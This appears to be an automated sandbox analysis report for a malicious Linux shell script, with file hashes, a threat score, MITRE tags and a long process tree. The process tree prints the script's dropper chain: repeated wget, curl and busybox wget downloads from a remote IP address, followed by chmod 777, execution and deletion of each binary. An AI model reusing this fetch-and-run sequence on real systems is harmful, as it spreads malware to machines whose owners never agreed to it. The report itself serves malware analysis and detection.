9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2

Analysis

max time kernel
35s
max time network
129s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
21-11-2024 07:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2.sh
Size

10KB
MD5

a1defdb85efc4f43f3026f633f9d8642
SHA1

50c5a077d2f6661aae89e985d3ed38d1c6678db1
SHA256

9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2
SHA512

ccce629290ff01417dcfcaa9313b1d4fe996f2d0131a5e211a0d9b41c81883bc0aced8f92fce2e96cc8216fcd2be2d5c1703f77c54706880e444a2bbe868b459
SSDEEP

192:hhYH7jooSYSyovzbEXvHC+OU1RZEEhWsRH7jooECSyovzkXvHC+V1RZEEs:Pp1tOo

Score

7^/10

defense_evasion

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 28 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

Processes:

chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmod

pid	process
1520	chmod
1556	chmod
1642	chmod
1648	chmod
1654	chmod
1660	chmod
1562	chmod
1666	chmod
1514	chmod
1532	chmod
1604	chmod
1610	chmod
1538	chmod
1586	chmod
1616	chmod
1544	chmod
1592	chmod
1634	chmod
1622	chmod
1628	chmod
1508	chmod
1526	chmod
1550	chmod
1568	chmod
1580	chmod
1598	chmod
1672	chmod
1574	chmod

Executes dropped EXE 28 IoCs

Processes:

tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoee8NickSVHHGc0CKiNoIeQQeLHFwsfykCoztEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9NeEfuuLaOesxwARQirEHUr8hwbo6uUPtCmWoUgB7802yL8EGGk7pLs8LQPIEsBTddncmWwnZK2byWknzW1gXWixRxIyczawUsL7rR9c8zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZUqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdOJXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ7xcf066zx6JjlSH0geP2dCyq8I4938BMoGxlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4aGHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4acayWFU8o0VGt74yfWT1bYNSzBkMqiwstoetQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Nee8NickSVHHGc0CKiNoIeQQeLHFwsfykCozJXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ7xcf066zx6JjlSH0geP2dCyq8I4938BMoGEfuuLaOesxwARQirEHUr8hwbo6uUPtCmWoUgB7802yL8EGGk7pLs8LQPIEsBTddncmWwnZK2byWknzW1gXWixRxIyczawUsL7rR9c8zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZUqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO

Writes file to tmp directory 28 IoCs

Malware often drops required files in the /tmp directory.

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for modification	/tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ	curl
File opened for modification	/tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ	curl
File opened for modification	/tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a	curl
File opened for modification	/tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc	curl
File opened for modification	/tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a	curl
File opened for modification	/tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG	curl
File opened for modification	/tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw	curl
File opened for modification	/tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8	curl
File opened for modification	/tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO	curl
File opened for modification	/tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6	curl
File opened for modification	/tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe	curl
File opened for modification	/tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne	curl
File opened for modification	/tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6	curl
File opened for modification	/tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc	curl
File opened for modification	/tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0	curl
File opened for modification	/tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ	curl
File opened for modification	/tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz	curl
File opened for modification	/tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ	curl
File opened for modification	/tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz	curl
File opened for modification	/tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0	curl
File opened for modification	/tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe	curl
File opened for modification	/tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne	curl
File opened for modification	/tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8	curl
File opened for modification	/tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO	curl
File opened for modification	/tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo	curl
File opened for modification	/tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo	curl
File opened for modification	/tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw	curl
File opened for modification	/tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG	curl

/tmp/9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2.sh
/tmp/9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2.sh
1⤵
PID:1499
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:1500
- /usr/bin/wget
  wget http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
  2⤵
  PID:1501
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
  2⤵
  - Writes file to tmp directory
  PID:1506
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
  2⤵
  PID:1507
- /bin/chmod
  chmod 777 tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
  2⤵
  - File and Directory Permissions Modification
  PID:1508
- /tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
  ./tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
  2⤵
  - Executes dropped EXE
  PID:1509
- /bin/rm
  rm tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
  2⤵
  PID:1510
- /usr/bin/wget
  wget http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
  2⤵
  PID:1511
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
  2⤵
  - Writes file to tmp directory
  PID:1512
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
  2⤵
  PID:1513
- /bin/chmod
  chmod 777 cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
  2⤵
  - File and Directory Permissions Modification
  PID:1514
- /tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
  ./cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
  2⤵
  - Executes dropped EXE
  PID:1515
- /bin/rm
  rm cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
  2⤵
  PID:1516
- /usr/bin/wget
  wget http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
  2⤵
  PID:1517
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
  2⤵
  - Writes file to tmp directory
  PID:1518
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
  2⤵
  PID:1519
- /bin/chmod
  chmod 777 e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
  2⤵
  - File and Directory Permissions Modification
  PID:1520
- /tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
  ./e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
  2⤵
  - Executes dropped EXE
  PID:1521
- /bin/rm
  rm e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
  2⤵
  PID:1522
- /usr/bin/wget
  wget http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
  2⤵
  PID:1523
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
  2⤵
  - Writes file to tmp directory
  PID:1524
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
  2⤵
  PID:1525
- /bin/chmod
  chmod 777 tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
  2⤵
  - File and Directory Permissions Modification
  PID:1526
- /tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
  ./tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
  2⤵
  - Executes dropped EXE
  PID:1527
- /bin/rm
  rm tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
  2⤵
  PID:1528
- /usr/bin/wget
  wget http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
  2⤵
  PID:1529
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
  2⤵
  - Writes file to tmp directory
  PID:1530
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
  2⤵
  PID:1531
- /bin/chmod
  chmod 777 EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
  2⤵
  - File and Directory Permissions Modification
  PID:1532
- /tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
  ./EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
  2⤵
  - Executes dropped EXE
  PID:1533
- /bin/rm
  rm EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
  2⤵
  PID:1534
- /usr/bin/wget
  wget http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
  2⤵
  PID:1535
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
  2⤵
  - Writes file to tmp directory
  PID:1536
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
  2⤵
  PID:1537
- /bin/chmod
  chmod 777 UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
  2⤵
  - File and Directory Permissions Modification
  PID:1538
- /tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
  ./UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
  2⤵
  - Executes dropped EXE
  PID:1539
- /bin/rm
  rm UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
  2⤵
  PID:1540
- /usr/bin/wget
  wget http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
  2⤵
  PID:1541
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
  2⤵
  - Writes file to tmp directory
  PID:1542
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
  2⤵
  PID:1543
- /bin/chmod
  chmod 777 nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
  2⤵
  - File and Directory Permissions Modification
  PID:1544
- /tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
  ./nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
  2⤵
  - Executes dropped EXE
  PID:1545
- /bin/rm
  rm nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
  2⤵
  PID:1546
- /usr/bin/wget
  wget http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
  2⤵
  PID:1547
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
  2⤵
  - Writes file to tmp directory
  PID:1548
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
  2⤵
  PID:1549
- /bin/chmod
  chmod 777 zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
  2⤵
  - File and Directory Permissions Modification
  PID:1550
- /tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
  ./zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
  2⤵
  - Executes dropped EXE
  PID:1551
- /bin/rm
  rm zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
  2⤵
  PID:1552
- /usr/bin/wget
  wget http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO
  2⤵
  PID:1553
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO
  2⤵
  - Writes file to tmp directory
  PID:1554
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO
  2⤵
  PID:1555
- /bin/chmod
  chmod 777 UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO
  2⤵
  - File and Directory Permissions Modification
  PID:1556
- /tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO
  ./UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO
  2⤵
  - Executes dropped EXE
  PID:1557
- /bin/rm
  rm UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO
  2⤵
  PID:1558
- /usr/bin/wget
  wget http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
  2⤵
  PID:1559
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
  2⤵
  - Writes file to tmp directory
  PID:1560
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
  2⤵
  PID:1561
- /bin/chmod
  chmod 777 JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
  2⤵
  - File and Directory Permissions Modification
  PID:1562
- /tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
  ./JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
  2⤵
  - Executes dropped EXE
  PID:1563
- /bin/rm
  rm JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
  2⤵
  PID:1564
- /usr/bin/wget
  wget http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
  2⤵
  PID:1565
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
  2⤵
  - Writes file to tmp directory
  PID:1566
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
  2⤵
  PID:1567
- /bin/chmod
  chmod 777 7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
  2⤵
  - File and Directory Permissions Modification
  PID:1568
- /tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
  ./7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
  2⤵
  - Executes dropped EXE
  PID:1569
- /bin/rm
  rm 7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
  2⤵
  PID:1570
- /usr/bin/wget
  wget http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
  2⤵
  PID:1571
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
  2⤵
  - Writes file to tmp directory
  PID:1572
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
  2⤵
  PID:1573
- /bin/chmod
  chmod 777 xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
  2⤵
  - File and Directory Permissions Modification
  PID:1574
- /tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
  ./xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
  2⤵
  - Executes dropped EXE
  PID:1575
- /bin/rm
  rm xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
  2⤵
  PID:1576
- /usr/bin/wget
  wget http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
  2⤵
  PID:1577
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
  2⤵
  - Writes file to tmp directory
  PID:1578
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
  2⤵
  PID:1579
- /bin/chmod
  chmod 777 0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
  2⤵
  - File and Directory Permissions Modification
  PID:1580
- /tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
  ./0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
  2⤵
  - Executes dropped EXE
  PID:1581
- /bin/rm
  rm 0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
  2⤵
  PID:1582
- /usr/bin/wget
  wget http://216.126.231.240/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6
  2⤵
  PID:1583
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6
  2⤵
  - Writes file to tmp directory
  PID:1584
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6
  2⤵
  PID:1585
- /bin/chmod
  chmod 777 GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6
  2⤵
  - File and Directory Permissions Modification
  PID:1586
- /tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6
  ./GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6
  2⤵
  - Executes dropped EXE
  PID:1587
- /bin/rm
  rm GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6
  2⤵
  PID:1588
- /usr/bin/wget
  wget http://216.126.231.240/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6
  2⤵
  PID:1589
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6
  2⤵
  - Writes file to tmp directory
  PID:1590
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6
  2⤵
  PID:1591
- /bin/chmod
  chmod 777 GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6
  2⤵
  - File and Directory Permissions Modification
  PID:1592
- /tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6
  ./GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6
  2⤵
  - Executes dropped EXE
  PID:1593
- /bin/rm
  rm GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6
  2⤵
  PID:1594
- /usr/bin/wget
  wget http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
  2⤵
  PID:1595
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
  2⤵
  - Writes file to tmp directory
  PID:1596
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
  2⤵
  PID:1597
- /bin/chmod
  chmod 777 xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
  2⤵
  - File and Directory Permissions Modification
  PID:1598
- /tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
  ./xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
  2⤵
  - Executes dropped EXE
  PID:1599
- /bin/rm
  rm xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
  2⤵
  PID:1600
- /usr/bin/wget
  wget http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
  2⤵
  PID:1601
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
  2⤵
  - Writes file to tmp directory
  PID:1602
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
  2⤵
  PID:1603
- /bin/chmod
  chmod 777 0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
  2⤵
  - File and Directory Permissions Modification
  PID:1604
- /tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
  ./0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
  2⤵
  - Executes dropped EXE
  PID:1605
- /bin/rm
  rm 0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
  2⤵
  PID:1606
- /usr/bin/wget
  wget http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
  2⤵
  PID:1607
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
  2⤵
  - Writes file to tmp directory
  PID:1608
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
  2⤵
  PID:1609
- /bin/chmod
  chmod 777 cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
  2⤵
  - File and Directory Permissions Modification
  PID:1610
- /tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
  ./cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
  2⤵
  - Executes dropped EXE
  PID:1611
- /bin/rm
  rm cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
  2⤵
  PID:1612
- /usr/bin/wget
  wget http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
  2⤵
  PID:1613
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
  2⤵
  - Writes file to tmp directory
  PID:1614
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
  2⤵
  PID:1615
- /bin/chmod
  chmod 777 tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
  2⤵
  - File and Directory Permissions Modification
  PID:1616
- /tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
  ./tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
  2⤵
  - Executes dropped EXE
  PID:1617
- /bin/rm
  rm tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
  2⤵
  PID:1618
- /usr/bin/wget
  wget http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
  2⤵
  PID:1619
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
  2⤵
  - Writes file to tmp directory
  PID:1620
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
  2⤵
  PID:1621
- /bin/chmod
  chmod 777 tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
  2⤵
  - File and Directory Permissions Modification
  PID:1622
- /tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
  ./tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
  2⤵
  - Executes dropped EXE
  PID:1623
- /bin/rm
  rm tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
  2⤵
  PID:1624
- /usr/bin/wget
  wget http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
  2⤵
  PID:1625
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
  2⤵
  - Writes file to tmp directory
  PID:1626
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
  2⤵
  PID:1627
- /bin/chmod
  chmod 777 e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
  2⤵
  - File and Directory Permissions Modification
  PID:1628
- /tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
  ./e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
  2⤵
  - Executes dropped EXE
  PID:1629
- /bin/rm
  rm e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
  2⤵
  PID:1630
- /usr/bin/wget
  wget http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
  2⤵
  PID:1631
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
  2⤵
  - Writes file to tmp directory
  PID:1632
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
  2⤵
  PID:1633
- /bin/chmod
  chmod 777 JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
  2⤵
  - File and Directory Permissions Modification
  PID:1634
- /tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
  ./JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
  2⤵
  - Executes dropped EXE
  PID:1635
- /bin/rm
  rm JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
  2⤵
  PID:1636
- /usr/bin/wget
  wget http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
  2⤵
  PID:1637
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
  2⤵
  - Writes file to tmp directory
  PID:1638
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
  2⤵
  PID:1641
- /bin/chmod
  chmod 777 7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
  2⤵
  - File and Directory Permissions Modification
  PID:1642
- /tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
  ./7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
  2⤵
  - Executes dropped EXE
  PID:1643
- /bin/rm
  rm 7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
  2⤵
  PID:1644
- /usr/bin/wget
  wget http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
  2⤵
  PID:1645
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
  2⤵
  - Writes file to tmp directory
  PID:1646
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
  2⤵
  PID:1647
- /bin/chmod
  chmod 777 EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
  2⤵
  - File and Directory Permissions Modification
  PID:1648
- /tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
  ./EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
  2⤵
  - Executes dropped EXE
  PID:1649
- /bin/rm
  rm EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
  2⤵
  PID:1650
- /usr/bin/wget
  wget http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
  2⤵
  PID:1651
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
  2⤵
  - Writes file to tmp directory
  PID:1652
- /bin/busybox
